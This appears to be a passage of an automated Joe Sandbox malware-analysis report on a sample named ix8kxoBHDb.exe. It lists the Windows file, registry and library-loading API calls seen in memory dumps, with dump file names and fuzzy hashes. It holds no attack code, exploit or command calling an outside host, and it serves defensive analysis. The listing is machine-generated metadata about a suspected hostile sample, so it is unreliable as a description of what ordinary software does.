                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                  • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                  • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                  • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                  • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                  • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                  • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                  • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                  • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                  • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                  • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                  • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                  • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                    • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                    • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                    • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                  • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                  • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                  • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ix8kxoBHDb.exe,80000000,00000003), ref: 00405EE2
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                  • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                  • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                  • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                  • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                  • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                  • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000), ref: 73B02B6B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true
                                                  • Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 48872020de229a62096ca7b00bfccc01523ba1e4591b89c127ca9cc5ae31f5b5
                                                  • Instruction ID: 7f286b886bda2714a3e7c0fbf3f200766512b9af107a57fef57316454cad9111
                                                  • Opcode Fuzzy Hash: 48872020de229a62096ca7b00bfccc01523ba1e4591b89c127ca9cc5ae31f5b5
                                                  • Instruction Fuzzy Hash: DC4160F240420CDFEB31EF65DB8175E3B69FB14358F305436E5099F950EA3998888B91
                                                  APIs
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileMove
                                                  • String ID:
                                                  • API String ID: 3562171763-0
                                                  • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                  • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                  • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                  • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                  • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                  • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                  • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                  APIs
                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: PathSearch
                                                  • String ID:
                                                  • API String ID: 2203818243-0
                                                  • Opcode ID: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
                                                  • Instruction ID: 3617ef58ccd7aa140dffe44bfab91b8a7bb5611f18f48832d751fbee8bc5d3eb
                                                  • Opcode Fuzzy Hash: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
                                                  • Instruction Fuzzy Hash: AAE0DF72700100EBE710DFA4DE48EAA33A8DF40368B30823AF611B60D0E6B4A9419B3D
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                  APIs
                                                  • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                  APIs
                                                  • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004119EE,0040CED0,004033DE,0040CED0,004119EE,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                  APIs
